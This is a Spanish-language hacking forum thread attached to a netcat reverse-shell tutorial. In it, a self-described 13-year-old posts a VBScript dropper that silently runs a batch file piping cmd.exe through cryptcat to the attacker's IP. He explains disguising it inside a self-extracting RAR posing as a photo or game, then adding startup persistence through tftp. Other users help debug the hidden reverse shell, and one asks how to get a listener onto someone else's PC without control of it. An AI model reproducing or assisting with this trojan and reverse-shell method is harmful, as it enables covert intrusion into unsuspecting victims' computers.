 Autor
|
Tema: Paper: Obtener shell con Netcat (Leído 59320 veces)
|
RockoX
 Desconectado
Mensajes: 283
... L30 ...
|
Entiendo lo que quieres decir, pero creo que de manera remota no se puede, tal ves de manera local si.
Pero remota no, ya que en los batch que pones, estas enviando una shell con netcat, pero no puedes enviar comandos.
Buscate otras alternativas, por ejemplo Psexec, para ejecutar procesos remotos.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
joseang
Desconectado
Mensajes: 12
|
muy buen tuto, y un gran programa para ms dos el nc pero tengo una duda siempre en esto del nc y nunca consigo conectarme con nadia porque como pongo a la escucha el nc en el pc de la otra persona? si tadavia no tengo el control del pc
|
|
|
|
|
En línea
|
|
|
|
Novlucker
Colaborador
Desconectado
Mensajes: 1.606
|
como pongo a la escucha el nc en el pc de la otra persona? si tadavia no tengo el control del pc Jugando con netcat<---clickSaludos |
|
|
|
|
En línea
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein |
|
|
joseang
Desconectado
Mensajes: 12
|
gracias novlucker! provare aver.
|
|
|
|
|
En línea
|
|
|
|
X-Failed
Desconectado
Mensajes: 7
|
una pregunta y como haria para que se ejecute todos los dias y cada 5 segundos??? grax
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
en lugar de que se ejecute cada 5 segundos mejor ponlo que se ejecute al inicio y con eso te basta.
la verdad no le veo caso a hacer lo que mencionas
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
X-Failed
Desconectado
Mensajes: 7
|
Mira la verdad no uso el nc uso el cryptcat y el metodo k uso es el siguiente: primero pongo el crypcat y un codigo en .vbs asi set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"cryptcat.exe NUESTRA-IP 21 |cmd.exe| cryptcat.exe NUESTRA-IP 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide
luego de eso en un archivo usando wl winrar pongo una foto o un juego para que sospechen y le pongo el cryptcat y este codigo, pongo para que se autoejecute y sea el path en c:\windows\system32.. eso normal abro el cryptcat pongo -vvlp 21 y vuelvo abrir otra ventana y pongo -vvlp 25 por el 21 escribo y por el 25 recibo la shell me llega normal y todo luego mediante el tftp le subo el nircmd y tambien un codigo bat para que se agrege al iniciar el windows pero el problema es el siguiente una vez que yo cierre la shell osea cierre las dos ventanas de cryptcat tendria que esperar hasta que la victima vuelva a iniciar su pc y tendria que estar con los puertos a la escucha y si uso los comados at tendria que estar a una cierta hora.. por eso keria ver como acer para q me tire la shell cada 5 o 10 segundos o hay otra forma de recuperar la shell una vez quer cierro las dos ventanas gracias por tu paciencia xD apenas soy newbie y tengo 13 años y tenbgo ganas de aprender .. salu2 |
|
|
|
|
En línea
|
|
|
|
Yeshua
Desconectado
Mensajes: 164
Continuamente aprendiendo
|
Hola soy nuevo en el foro. Yo también e empezado con crypcat y e utilizado tambien el metodo de IP Inversa. La cuestio es qe yo ejecuto el rar el mi otra pc "victima" y pongo a la escuxa los puertos -vvlp 25 y -vvlp21.
Pues bien, para que en la pantalla de - vvlp 25 aparecezca c:\windows\system32 tengo que ejecutar el mismo rar en mi pc "cliente, por llamarlo así". Cuando escribo una orden, como la de abrir cd de la "victima" me sale farm7writer_5 o algo así, no recuerdo bien. Y la orden no se ejecuta claro.
Espero vuestra ayuda.
Saludos
|
|
|
|
|
En línea
|
Huir sí es de cobardes, correr no.  |
|
|
Novlucker
Colaborador
Desconectado
Mensajes: 1.606
|
Yeshua, no me termina de quedar claro, que es lo que estas haciendo. Veamos, lo que tu dices es que en pc "victima" ejecutas el rar "preparado", luego, en tu pc, pones en escucha los puertos 25 y 21, pero para que se te conecte correctamente, debes de ejecutar también el rar en tu pc? Esto me parece raro, de que modo lo estas haciendo, con un loop, porque si ejecutas primero el rar, y luego te pones a la escucha, la conexion se pierde ya que cuando intenta conectarse, aún tu no estas listo, si lo haces con un loop, intentará conectarse hasta que tu estes listo..... De lo contrario, intenta antes ponerte a la escucha, y luego ejecutar el rar (en la pc "victima") Saludos 
|
|
|
|
|
En línea
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein |
|
|
Anubis__
Desconectado
Mensajes: 5
Dios de los muertos
|
Hola!, Realmente no sabia donde poner esto, por que tiene un poco de todo, pero como al fin y al cabo es un "complemento" para la shell remota lo pongo aqui, si lo veis mejor en otro sitio, ya sabeis. Esto no tiene mucha utilidad real, pero por si alguna vez tengo que hacer una conexion a mi propio ordenador, pense en poner una clave de inicio, al conectarte, te pide la contraseña y usuario, si no es la que esta especificada te echa, algo asi: @echo off
echo Introduce el usuario:
Set /P _User=
If /i "%_user%"=="xxxxx" goto :Password
if NOT "%_user%"=="xxxx" goto :Adios
:password
echo Introduce la contraseña:
Set /P _pass=
if NOT "%_pass%"=="xxxx" goto :Adios
if /i "%_pass%"=="xxxxx" goto :Hola
:Hola
echo.
echo Eres bienvenido!
echo.
cmd.exe
:Adios
echo.
echo No eres bienvenido :( Funcionar funciona perfectamente, PERO, ¿Es seguro? (o todo lo seguro que se puede considerar ) Es decir, como el usuario/pass esta insertado en el mismo archivo, no hay ninguna forma de obtenerlo al conectarte? A ver que opinais, gracias!! |
|
|
|
|
En línea
|
|
|
|
Yeshua
Desconectado
Mensajes: 164
Continuamente aprendiendo
|
http://invisiblehack.mforos.com/1109904/7046144-tutorial-entrar-a-un-pc-con-ip/Lo saque de aqui, sigo todos los pasos y para que me salga tras la escucha ese pantallazo del -vvlp 25, tal y como aparece en el tutorial (ultimas hojas), tengo qe ejecutar tb el rar en mi pc, además de en el de la victimas claro, que ya se ejecutó y está instalado (lo se xq es mi otro pc y lo comprobe). a lo mejor es que no espero lo suficiente, no se, lo dejo unos 2 minutos a la escucha. Pero me canso de esperar (disculpadme pero soy algo novato), entonces lo que hago es ejecutarlo el rar en mi pc como dice que ace el del tuto.
|
|
|
|
|
En línea
|
Huir sí es de cobardes, correr no. |
|
|
Novlucker
Colaborador
Desconectado
Mensajes: 1.606
|
Bueno, por lo que he visto, estas utilizando el mismo *.vbs que ha mostrado X-Failed, y dicho *.vbs estaría ok, y según entiendo llegas ha realizar la conexión, así que deja unos pantallazos para ver mejor cual sería tu problema  , a ver si se ve el error..... Saludos |
|
|
|
|
En línea
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein |
|
|
Yeshua
Desconectado
Mensajes: 164
Continuamente aprendiendo
|
Puff, ojala pudiera ponerte el pantallazo, pro esq no me conecta ahora. Es eso normal??? ai alguna vez que no se xq no ma conectao a la primera, pro es que hoy ya se pasa de lo normal.
Ya se que no sirve mucho esto, pero el pantallazo de -vvlp 25 es exactamente igual que el del tutorial. Luego en -vvlp 21 escribo la orden de abrir el cd y me daba fram9_writer 16 en ambas pantallas...
De todas formas seguire intentadolo para copiarlo todo, eso si, me mosquea que no conecte...
Muchas gracias por tu interés.
(ya tengo descubierto xq no me conecta, se me cambio la ip privada, ¿¿se puede cambiar de alguna forma, o me toca crear otro pakete y otro .vbs con mi nueva ip 192.xxx.x.34, cuando la de antes era 192.xxx.x.33)??
|
|
|
|
« Última modificación: 21 Agosto 2008, 17:38 por Yeshua »
|
En línea
|
Huir sí es de cobardes, correr no. |
|
|
Anubis__
Desconectado
Mensajes: 5
Dios de los muertos
|
(ya tengo descubierto xq no me conecta, se me cambio la ip privada, ¿¿se puede cambiar de alguna forma, o me toca crear otro pakete y otro .vbs con mi nueva ip 192.xxx.x.34, cuando la de antes era 192.xxx.x.33)??
Eso tiene facil solucion, es tema del DHCP del router lo que viene siendo (creo) la asignacion automatica de ip´s. Si has conectado algun otro dispositivo, o simplemente, por que se le va la pinza, asigna la siguiente ip disponible dentro del rango. Para solucionar esto si estas usando windows es tan sencillo como: - Irte a la configuracion de la red - Seleccionar la red actual y darle a propiedades - TCP/IPv4 propiedades - Seleccionas usar la siguiente ip (La ip privada que quieras, la mascara se suele poner sola, la puerta de enlace el router y las DNS apuntalas antes de hacerlo). Y ya esta, ip privada estatica en ese ordenador. En caso de linux, pues depende de la version, pero es basicamente lo mismo, aunque si tienes problemas, tambien se peude asignar (por lo menos en mi router) una ip a una determinada MAC. Espero solucionarte algo |
|
|
|
|
En línea
|
|
|
|
Yeshua
Desconectado
Mensajes: 164
Continuamente aprendiendo
|
Ya solucioné el problema de la conectividad, jeje, era eso, ya tengo la ip privada fija, muchas gracias, asi progreso mucho mas rapido con estas ayudas.
Ahora qeda el problema de las ordenes...
bien, una vez puesto a la escucha, -vvlp 21 y -vvlp 25 y pinchando en el archivo de rar qe me qede guardado me sale esto en el 21
Cmd line: -vvlp 21
listening on [any] 21 ...
connect to [192.168.1.33] from rlb-8d5eb78ad12 [192.168.1.33] 4294
y en el -vvlp 25
Cmd line: -vvlp 25
listening on [any] 25 ...
connect to [192.168.1.33] from rlb-8d5eb78ad12 [192.168.1.33] 4295
farm9crypt_read 8192
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\WINDOWS\system32>
Ahora bien, si ejecuto ((( igfxdll.exe open cdrom d: ))) para abrir el cd me da esto:
Cmd line: -vvlp 21
listening on [any] 21 ...
connect to [192.168.1.33] from rlb-8d5eb78ad12 [192.168.1.33] 4294
igfxdll.exe open cdrom d:
farm9crypt_write 26
Cmd line: -vvlp 25
listening on [any] 25 ...
connect to [192.168.1.33] from rlb-8d5eb78ad12 [192.168.1.33] 4295
farm9crypt_read 8192
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\WINDOWS\system32>farm9crypt_read 8192
igfxdll.exe open cdrom d:
farm9crypt_read 8192
farm9crypt_read 8192
c:\WINDOWS\system32>
Espero que os aclare algo xq me tene estresao ggg....
|
|
|
|
« Última modificación: 23 Agosto 2008, 18:45 por Yeshua »
|
En línea
|
Huir sí es de cobardes, correr no. |
|
|
|
 |
